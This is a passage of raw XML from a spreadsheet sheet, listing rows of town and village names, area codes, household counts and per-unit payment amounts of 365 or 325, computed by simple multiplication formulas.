      <c r="J162" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K162" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="163" customHeight="1" spans="1:11">
      <c r="A163" s="23" t="s">
        <v>642</v>
      </c>
      <c r="B163" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C163" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D163" s="24" t="s">
        <v>643</v>
      </c>
      <c r="E163" s="24" t="s">
        <v>561</v>
      </c>
      <c r="F163" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G163" s="24">
        <v>2</v>
      </c>
      <c r="H163" s="25">
        <v>325</v>
      </c>
      <c r="I163" s="24">
        <f t="shared" si="2"/>
        <v>650</v>
      </c>
      <c r="J163" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K163" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="164" customHeight="1" spans="1:11">
      <c r="A164" s="23" t="s">
        <v>644</v>
      </c>
      <c r="B164" s="24" t="str">
        <f>B163</f>
        <v>城关镇</v>
      </c>
      <c r="C164" s="24" t="str">
        <f>C163</f>
        <v>西北村</v>
      </c>
      <c r="D164" s="30" t="s">
        <v>645</v>
      </c>
      <c r="E164" s="31" t="s">
        <v>646</v>
      </c>
      <c r="F164" s="24" t="str">
        <f>F163</f>
        <v>4113210106</v>
      </c>
      <c r="G164" s="24"/>
      <c r="H164" s="24"/>
      <c r="I164" s="24">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="J164" s="24"/>
      <c r="K164" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="165" customHeight="1" spans="1:11">
      <c r="A165" s="23" t="s">
        <v>647</v>
      </c>
      <c r="B165" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C165" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D165" s="24" t="s">
        <v>648</v>
      </c>
      <c r="E165" s="24" t="s">
        <v>331</v>
      </c>
      <c r="F165" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G165" s="24">
        <v>1</v>
      </c>
      <c r="H165" s="25">
        <v>365</v>
      </c>
      <c r="I165" s="24">
        <f t="shared" si="2"/>
        <v>365</v>
      </c>
      <c r="J165" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K165" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="166" customHeight="1" spans="1:11">
      <c r="A166" s="23" t="s">
        <v>649</v>
      </c>
      <c r="B166" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C166" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D166" s="24" t="s">
        <v>650</v>
      </c>
      <c r="E166" s="24" t="s">
        <v>273</v>
      </c>
      <c r="F166" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G166" s="24">
        <v>1</v>
      </c>
      <c r="H166" s="25">
        <v>365</v>
      </c>
      <c r="I166" s="24">
        <f t="shared" si="2"/>
        <v>365</v>
      </c>
      <c r="J166" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K166" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="167" customHeight="1" spans="1:11">
      <c r="A167" s="23" t="s">
        <v>651</v>
      </c>
      <c r="B167" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C167" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D167" s="24" t="s">
        <v>652</v>
      </c>
      <c r="E167" s="24" t="s">
        <v>288</v>
      </c>
      <c r="F167" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G167" s="24">
        <v>1</v>
      </c>
      <c r="H167" s="25">
        <v>365</v>
      </c>
      <c r="I167" s="24">
        <f t="shared" si="2"/>
        <v>365</v>
      </c>
      <c r="J167" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K167" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="168" customHeight="1" spans="1:11">
      <c r="A168" s="23" t="s">
        <v>653</v>
      </c>
      <c r="B168" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C168" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D168" s="24" t="s">
        <v>654</v>
      </c>
      <c r="E168" s="24" t="s">
        <v>655</v>
      </c>
      <c r="F168" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G168" s="24">
        <v>1</v>
      </c>
      <c r="H168" s="25">
        <v>365</v>
      </c>
      <c r="I168" s="24">
        <f t="shared" si="2"/>
        <v>365</v>
      </c>
      <c r="J168" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K168" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="169" customHeight="1" spans="1:11">
      <c r="A169" s="23" t="s">
        <v>656</v>
      </c>
      <c r="B169" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C169" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D169" s="24" t="s">
        <v>657</v>
      </c>
      <c r="E169" s="24" t="s">
        <v>306</v>
      </c>
      <c r="F169" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G169" s="24">
        <v>1</v>
      </c>
      <c r="H169" s="25">
        <v>365</v>
      </c>
      <c r="I169" s="24">
        <f t="shared" si="2"/>
        <v>365</v>
      </c>
      <c r="J169" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K169" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="170" customHeight="1" spans="1:11">
      <c r="A170" s="23" t="s">
        <v>658</v>
      </c>
      <c r="B170" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C170" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D170" s="24" t="s">
        <v>659</v>
      </c>
      <c r="E170" s="24" t="s">
        <v>323</v>
      </c>
      <c r="F170" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G170" s="24">
        <v>1</v>
      </c>
      <c r="H170" s="25">
        <v>365</v>
      </c>
      <c r="I170" s="24">
        <f t="shared" si="2"/>
        <v>365</v>
      </c>
      <c r="J170" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K170" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="171" customHeight="1" spans="1:11">
      <c r="A171" s="23" t="s">
        <v>660</v>
      </c>
      <c r="B171" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C171" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D171" s="24" t="s">
        <v>661</v>
      </c>
      <c r="E171" s="24" t="s">
        <v>662</v>
      </c>
      <c r="F171" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G171" s="24">
        <v>1</v>
      </c>
      <c r="H171" s="25">
        <v>365</v>
      </c>
      <c r="I171" s="24">
        <f t="shared" si="2"/>
        <v>365</v>
      </c>
      <c r="J171" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K171" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="172" customHeight="1" spans="1:11">
      <c r="A172" s="23" t="s">
        <v>663</v>
      </c>
      <c r="B172" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C172" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D172" s="24" t="s">
        <v>664</v>
      </c>
      <c r="E172" s="24" t="s">
        <v>320</v>
      </c>
      <c r="F172" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G172" s="24">
        <v>1</v>
      </c>
      <c r="H172" s="25">
        <v>365</v>
      </c>
      <c r="I172" s="24">
        <f t="shared" si="2"/>
        <v>365</v>
      </c>
      <c r="J172" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K172" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="173" customHeight="1" spans="1:11">
      <c r="A173" s="23" t="s">
        <v>665</v>
      </c>
      <c r="B173" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C173" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D173" s="24" t="s">
        <v>666</v>
      </c>
      <c r="E173" s="24" t="s">
        <v>540</v>
      </c>
      <c r="F173" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G173" s="24">
        <v>1</v>
      </c>
      <c r="H173" s="25">
        <v>365</v>
      </c>
      <c r="I173" s="24">
        <f t="shared" si="2"/>
        <v>365</v>
      </c>
      <c r="J173" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K173" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="174" customHeight="1" spans="1:11">
      <c r="A174" s="23" t="s">
        <v>667</v>
      </c>
      <c r="B174" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C174" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D174" s="24" t="s">
        <v>668</v>
      </c>
      <c r="E174" s="24" t="s">
        <v>669</v>
      </c>
      <c r="F174" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G174" s="24">
        <v>1</v>
      </c>
      <c r="H174" s="25">
        <v>365</v>
      </c>
      <c r="I174" s="24">
        <f t="shared" si="2"/>
        <v>365</v>
      </c>
      <c r="J174" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K174" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="175" customHeight="1" spans="1:11">
      <c r="A175" s="23" t="s">
        <v>670</v>
      </c>
      <c r="B175" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C175" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D175" s="24" t="s">
        <v>671</v>
      </c>
      <c r="E175" s="24" t="s">
        <v>672</v>
      </c>
      <c r="F175" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G175" s="24">
        <v>1</v>
      </c>
      <c r="H175" s="25">
        <v>365</v>
      </c>
      <c r="I175" s="24">
        <f t="shared" si="2"/>
        <v>365</v>
      </c>
      <c r="J175" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K175" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="176" customHeight="1" spans="1:11">
      <c r="A176" s="23" t="s">
        <v>673</v>
      </c>
      <c r="B176" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C176" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D176" s="23" t="s">
        <v>674</v>
      </c>
      <c r="E176" s="23" t="s">
        <v>416</v>
      </c>
      <c r="F176" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G176" s="24">
        <v>1</v>
      </c>
      <c r="H176" s="25">
        <v>365</v>
      </c>
      <c r="I176" s="24">
        <f t="shared" si="2"/>
        <v>365</v>
      </c>
      <c r="J176" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K176" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="177" customHeight="1" spans="1:11">
      <c r="A177" s="23" t="s">
        <v>675</v>
      </c>
      <c r="B177" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C177" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D177" s="24" t="s">
        <v>676</v>
      </c>
      <c r="E177" s="24" t="s">
        <v>677</v>
      </c>
      <c r="F177" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G177" s="24">
        <v>1</v>
      </c>
      <c r="H177" s="25">
        <v>365</v>
      </c>
      <c r="I177" s="24">
        <f t="shared" si="2"/>
        <v>365</v>
      </c>
      <c r="J177" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K177" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="178" customHeight="1" spans="1:11">
      <c r="A178" s="23" t="s">
        <v>678</v>
      </c>
      <c r="B178" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C178" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D178" s="24" t="s">
        <v>679</v>
      </c>
      <c r="E178" s="24" t="s">
        <v>265</v>
      </c>
      <c r="F178" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G178" s="24">
        <v>2</v>
      </c>
      <c r="H178" s="25">
        <v>325</v>
      </c>
      <c r="I178" s="24">
        <f t="shared" si="2"/>
        <v>650</v>
      </c>
      <c r="J178" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K178" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="179" customHeight="1" spans="1:11">
      <c r="A179" s="23" t="s">
        <v>680</v>
      </c>
      <c r="B179" s="24" t="str">
        <f>B178</f>
        <v>城关镇</v>
      </c>
      <c r="C179" s="24" t="str">
        <f>C178</f>
        <v>北外村</v>
      </c>
      <c r="D179" s="30" t="s">
        <v>681</v>
      </c>
      <c r="E179" s="30" t="s">
        <v>497</v>
      </c>
      <c r="F179" s="24" t="str">
        <f>F178</f>
        <v>4113210102</v>
      </c>
      <c r="G179" s="24"/>
      <c r="H179" s="24"/>
      <c r="I179" s="24">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="J179" s="24"/>
      <c r="K179" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="180" customHeight="1" spans="1:11">
      <c r="A180" s="23" t="s">
        <v>682</v>
      </c>
      <c r="B180" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C180" s="24" t="s">
        <v>220</v>
      </c>
      <c r="D180" s="24" t="s">
        <v>683</v>
      </c>
      <c r="E180" s="24" t="s">
        <v>397</v>
      </c>
      <c r="F180" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G180" s="24">
        <v>2</v>
      </c>
      <c r="H180" s="25">
        <v>325</v>
      </c>
      <c r="I180" s="24">
        <f t="shared" si="2"/>
        <v>650</v>
      </c>
      <c r="J180" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K180" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="181" customHeight="1" spans="1:11">
      <c r="A181" s="23" t="s">
        <v>684</v>
      </c>
      <c r="B181" s="24" t="str">
        <f>B180</f>
        <v>城关镇</v>
      </c>
      <c r="C181" s="24" t="str">
        <f>C180</f>
        <v>东北六组</v>
      </c>
      <c r="D181" s="23" t="s">
        <v>685</v>
      </c>
      <c r="E181" s="23" t="s">
        <v>239</v>
      </c>
      <c r="F181" s="24" t="str">
        <f>F180</f>
        <v>4113210103</v>
      </c>
      <c r="G181" s="24"/>
      <c r="H181" s="24"/>
      <c r="I181" s="24">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="J181" s="24"/>
      <c r="K181" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="182" customHeight="1" spans="1:11">
      <c r="A182" s="23" t="s">
        <v>686</v>
      </c>
      <c r="B182" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C182" s="24" t="s">
        <v>318</v>
      </c>
      <c r="D182" s="24" t="s">
        <v>687</v>
      </c>
      <c r="E182" s="24" t="s">
        <v>265</v>
      </c>
      <c r="F182" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G182" s="24">
        <v>1</v>
      </c>
      <c r="H182" s="25">
        <v>365</v>
      </c>
      <c r="I182" s="24">
        <f t="shared" si="2"/>
        <v>365</v>
      </c>
      <c r="J182" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K182" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="183" customHeight="1" spans="1:11">
      <c r="A183" s="23" t="s">
        <v>688</v>
      </c>
      <c r="B183" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C183" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D183" s="24" t="s">
        <v>689</v>
      </c>
      <c r="E183" s="24" t="s">
        <v>370</v>
      </c>
      <c r="F183" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G183" s="24">
        <v>1</v>
      </c>
      <c r="H183" s="25">
        <v>365</v>
      </c>
      <c r="I183" s="24">
        <f t="shared" si="2"/>
        <v>365</v>
      </c>
      <c r="J183" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K183" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="184" customHeight="1" spans="1:11">
      <c r="A184" s="23" t="s">
        <v>690</v>
      </c>
      <c r="B184" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C184" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D184" s="24" t="s">
        <v>691</v>
      </c>
      <c r="E184" s="24" t="s">
        <v>222</v>
      </c>
      <c r="F184" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G184" s="24">
        <v>1</v>
      </c>
      <c r="H184" s="25">
        <v>365</v>
      </c>
      <c r="I184" s="24">
        <f t="shared" si="2"/>
        <v>365</v>
      </c>
      <c r="J184" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K184" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="185" customHeight="1" spans="1:11">
      <c r="A185" s="23" t="s">
        <v>692</v>
      </c>
      <c r="B185" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C185" s="24" t="s">
        <v>271</v>
      </c>
      <c r="D185" s="24" t="s">
        <v>693</v>
      </c>
      <c r="E185" s="24" t="s">
        <v>694</v>
      </c>
      <c r="F185" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G185" s="24">
        <v>1</v>
      </c>
      <c r="H185" s="25">
        <v>365</v>
      </c>
      <c r="I185" s="24">
        <f t="shared" si="2"/>
        <v>365</v>
      </c>
      <c r="J185" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K185" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="186" customHeight="1" spans="1:11">
      <c r="A186" s="23" t="s">
        <v>695</v>
      </c>
      <c r="B186" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C186" s="24" t="s">
        <v>220</v>
      </c>
      <c r="D186" s="24" t="s">
        <v>696</v>
      </c>
      <c r="E186" s="24" t="s">
        <v>697</v>
      </c>
      <c r="F186" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G186" s="24">
        <v>2</v>
      </c>
      <c r="H186" s="25">
        <v>325</v>
      </c>
      <c r="I186" s="24">
        <f t="shared" si="2"/>
        <v>650</v>
      </c>
      <c r="J186" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K186" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="187" customHeight="1" spans="1:11">
      <c r="A187" s="23" t="s">
        <v>698</v>
      </c>
      <c r="B187" s="24" t="str">
        <f>B186</f>
        <v>城关镇</v>
      </c>
      <c r="C187" s="24" t="str">
        <f>C186</f>
        <v>东北六组</v>
      </c>
      <c r="D187" s="23" t="s">
        <v>699</v>
      </c>
      <c r="E187" s="23" t="s">
        <v>239</v>
      </c>
      <c r="F187" s="24" t="str">
        <f>F186</f>
        <v>4113210103</v>
      </c>
      <c r="G187" s="24"/>
      <c r="H187" s="24"/>
      <c r="I187" s="24">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="J187" s="24"/>
      <c r="K187" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="188" customHeight="1" spans="1:11">
      <c r="A188" s="23" t="s">
        <v>700</v>
      </c>
      <c r="B188" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C188" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D188" s="24" t="s">
        <v>701</v>
      </c>
      <c r="E188" s="24" t="s">
        <v>331</v>
      </c>
      <c r="F188" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G188" s="24">
        <v>1</v>
      </c>
      <c r="H188" s="25">
        <v>365</v>
      </c>
      <c r="I188" s="24">
        <f t="shared" si="2"/>
        <v>365</v>
      </c>
      <c r="J188" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K188" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="189" customHeight="1" spans="1:11">
      <c r="A189" s="23" t="s">
        <v>702</v>
      </c>
      <c r="B189" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C189" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D189" s="24" t="s">
        <v>703</v>
      </c>
      <c r="E189" s="24" t="s">
        <v>704</v>
      </c>
      <c r="F189" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G189" s="24">
        <v>1</v>
      </c>
      <c r="H189" s="25">
        <v>365</v>
      </c>
      <c r="I189" s="24">
        <f t="shared" si="2"/>
        <v>365</v>
      </c>
      <c r="J189" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K189" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="190" customHeight="1" spans="1:11">
      <c r="A190" s="23" t="s">
        <v>705</v>
      </c>
      <c r="B190" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C190" s="24" t="s">
        <v>220</v>
      </c>
      <c r="D190" s="24" t="s">
        <v>706</v>
      </c>
      <c r="E190" s="24" t="s">
        <v>312</v>
      </c>
      <c r="F190" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G190" s="24">
        <v>2</v>
      </c>
      <c r="H190" s="25">
        <v>325</v>
      </c>
      <c r="I190" s="24">
        <f t="shared" si="2"/>
        <v>650</v>
      </c>
      <c r="J190" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K190" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="191" customHeight="1" spans="1:11">
      <c r="A191" s="23" t="s">
        <v>707</v>
      </c>
      <c r="B191" s="24" t="str">
        <f>B190</f>
        <v>城关镇</v>
      </c>
      <c r="C191" s="24" t="str">
        <f>C190</f>
        <v>东北六组</v>
      </c>
      <c r="D191" s="23" t="s">
        <v>708</v>
      </c>
      <c r="E191" s="23" t="s">
        <v>416</v>
      </c>
      <c r="F191" s="24" t="str">
        <f>F190</f>
        <v>4113210103</v>
      </c>
      <c r="G191" s="24"/>
      <c r="H191" s="24"/>
      <c r="I191" s="24">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="J191" s="24"/>
      <c r="K191" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="192" customHeight="1" spans="1:11">
      <c r="A192" s="23" t="s">
        <v>709</v>
      </c>
      <c r="B192" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C192" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D192" s="24" t="s">
        <v>710</v>
      </c>
      <c r="E192" s="24" t="s">
        <v>711</v>
      </c>
      <c r="F192" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G192" s="24">
        <v>2</v>
      </c>
      <c r="H192" s="25">
        <v>325</v>
      </c>
      <c r="I192" s="24">
        <f t="shared" si="2"/>
        <v>650</v>
      </c>
      <c r="J192" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K192" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="193" customHeight="1" spans="1:11">
      <c r="A193" s="23" t="s">
        <v>712</v>
      </c>
      <c r="B193" s="24" t="str">
        <f>B192</f>
        <v>城关镇</v>
      </c>
      <c r="C193" s="24" t="str">
        <f>C192</f>
        <v>中华村</v>
      </c>
      <c r="D193" s="23" t="s">
        <v>713</v>
      </c>
      <c r="E193" s="23" t="s">
        <v>552</v>
      </c>
      <c r="F193" s="24" t="str">
        <f>F192</f>
        <v>4113210108</v>
      </c>
      <c r="G193" s="24"/>
      <c r="H193" s="24"/>
      <c r="I193" s="24">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="J193" s="24"/>
      <c r="K193" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="194" customHeight="1" spans="1:11">
      <c r="A194" s="23" t="s">
        <v>714</v>
      </c>
      <c r="B194" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C194" s="24" t="s">
        <v>318</v>
      </c>
      <c r="D194" s="24" t="s">
        <v>715</v>
      </c>
      <c r="E194" s="24" t="s">
        <v>331</v>
      </c>
      <c r="F194" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G194" s="24">
        <v>2</v>
      </c>
      <c r="H194" s="25">
        <v>325</v>
      </c>
      <c r="I194" s="24">
        <f t="shared" si="2"/>
        <v>650</v>
      </c>
      <c r="J194" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K194" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="195" customHeight="1" spans="1:11">
      <c r="A195" s="23" t="s">
        <v>716</v>
      </c>
      <c r="B195" s="24" t="str">
        <f>B194</f>
        <v>城关镇</v>
      </c>
      <c r="C195" s="24" t="str">
        <f>C194</f>
        <v>东北一组</v>
      </c>
      <c r="D195" s="23" t="s">
        <v>717</v>
      </c>
      <c r="E195" s="32" t="s">
        <v>303</v>
      </c>
      <c r="F195" s="24" t="str">
        <f>F194</f>
        <v>4113210103</v>
      </c>
      <c r="G195" s="24"/>
      <c r="H195" s="24"/>
      <c r="I195" s="24">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="J195" s="24"/>
      <c r="K195" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="196" customHeight="1" spans="1:11">
      <c r="A196" s="23" t="s">
        <v>718</v>
      </c>
      <c r="B196" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C196" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D196" s="24" t="s">
        <v>719</v>
      </c>
      <c r="E196" s="24" t="s">
        <v>288</v>
      </c>
      <c r="F196" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G196" s="24">
        <v>1</v>
      </c>
      <c r="H196" s="25">
        <v>365</v>
      </c>
      <c r="I196" s="24">
        <f t="shared" ref="I196:I259" si="3">H196*G196</f>
        <v>365</v>
      </c>
      <c r="J196" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K196" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="197" customHeight="1" spans="1:11">
      <c r="A197" s="23" t="s">
        <v>720</v>
      </c>
      <c r="B197" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C197" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D197" s="24" t="s">
        <v>721</v>
      </c>
      <c r="E197" s="24" t="s">
        <v>578</v>
      </c>
      <c r="F197" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G197" s="24">
        <v>1</v>
      </c>
      <c r="H197" s="25">
        <v>365</v>
      </c>
      <c r="I197" s="24">
        <f t="shared" si="3"/>
        <v>365</v>
      </c>
      <c r="J197" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K197" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="198" customHeight="1" spans="1:11">
      <c r="A198" s="23" t="s">
        <v>722</v>
      </c>
      <c r="B198" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C198" s="24" t="s">
        <v>318</v>
      </c>
      <c r="D198" s="24" t="s">
        <v>723</v>
      </c>
      <c r="E198" s="24" t="s">
        <v>697</v>
      </c>
      <c r="F198" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G198" s="24">
        <v>2</v>
      </c>
      <c r="H198" s="25">
        <v>325</v>
      </c>
      <c r="I198" s="24">
        <f t="shared" si="3"/>
        <v>650</v>
      </c>
      <c r="J198" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K198" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="199" customHeight="1" spans="1:11">
      <c r="A199" s="23" t="s">
        <v>724</v>
      </c>
      <c r="B199" s="24" t="str">
        <f>B198</f>
        <v>城关镇</v>
      </c>
      <c r="C199" s="24" t="str">
        <f>C198</f>
        <v>东北一组</v>
      </c>
      <c r="D199" s="23" t="s">
        <v>725</v>
      </c>
      <c r="E199" s="23" t="s">
        <v>303</v>
      </c>
      <c r="F199" s="24" t="str">
        <f>F198</f>
        <v>4113210103</v>
      </c>
      <c r="G199" s="24"/>
      <c r="H199" s="24"/>
      <c r="I199" s="24">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="J199" s="24"/>
      <c r="K199" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="200" customHeight="1" spans="1:11">
      <c r="A200" s="23" t="s">
        <v>726</v>
      </c>
      <c r="B200" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C200" s="24" t="s">
        <v>318</v>
      </c>
      <c r="D200" s="24" t="s">
        <v>727</v>
      </c>
      <c r="E200" s="24" t="s">
        <v>552</v>
      </c>
      <c r="F200" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G200" s="24">
        <v>1</v>
      </c>
      <c r="H200" s="25">
        <v>365</v>
      </c>
      <c r="I200" s="24">
        <f t="shared" si="3"/>
        <v>365</v>
      </c>
      <c r="J200" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K200" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="201" customHeight="1" spans="1:11">
      <c r="A201" s="23" t="s">
        <v>728</v>
      </c>
      <c r="B201" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C201" s="24" t="s">
        <v>318</v>
      </c>
      <c r="D201" s="24" t="s">
        <v>729</v>
      </c>
      <c r="E201" s="24" t="s">
        <v>730</v>
      </c>
      <c r="F201" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G201" s="24">
        <v>1</v>
      </c>
      <c r="H201" s="25">
        <v>365</v>
      </c>
      <c r="I201" s="24">
        <f t="shared" si="3"/>
        <v>365</v>
      </c>
      <c r="J201" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K201" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="202" customHeight="1" spans="1:11">
      <c r="A202" s="23" t="s">
        <v>731</v>
      </c>
      <c r="B202" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C202" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D202" s="24" t="s">
        <v>732</v>
      </c>
      <c r="E202" s="24" t="s">
        <v>370</v>
      </c>
      <c r="F202" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G202" s="24">
        <v>1</v>
      </c>
      <c r="H202" s="25">
        <v>365</v>
      </c>
      <c r="I202" s="24">
        <f t="shared" si="3"/>
        <v>365</v>
      </c>
      <c r="J202" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K202" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="203" customHeight="1" spans="1:11">
      <c r="A203" s="23" t="s">
        <v>733</v>
      </c>
      <c r="B203" s="24" t="s">
        <v>219</v>
      </c>
